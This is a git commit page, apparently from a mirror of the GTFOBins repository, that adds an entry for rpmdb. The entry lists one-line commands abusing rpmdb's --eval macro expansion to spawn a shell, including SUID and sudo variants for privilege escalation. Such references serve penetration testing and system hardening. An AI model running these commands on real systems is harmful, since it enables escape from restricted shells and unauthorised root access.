1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Add rpmdb

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
Mateus 2022-06-28 16:15:58 -03:00 committed by GitHub
parent 61f79ef933
commit 0a60c6239e
Signed by: GitHub
GPG Key ID: 4AEE18F83AFDEB23

9
_gtfobins/rpmdb.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
shell:
- code: rpmdb --eval '%(/bin/sh 1>&2)'
limited-suid:
- code: ./rpmdb --eval '%(/bin/sh 1>&2)'
sudo:
- code: sudo rpmdb --eval '%(/bin/sh 1>&2)'
---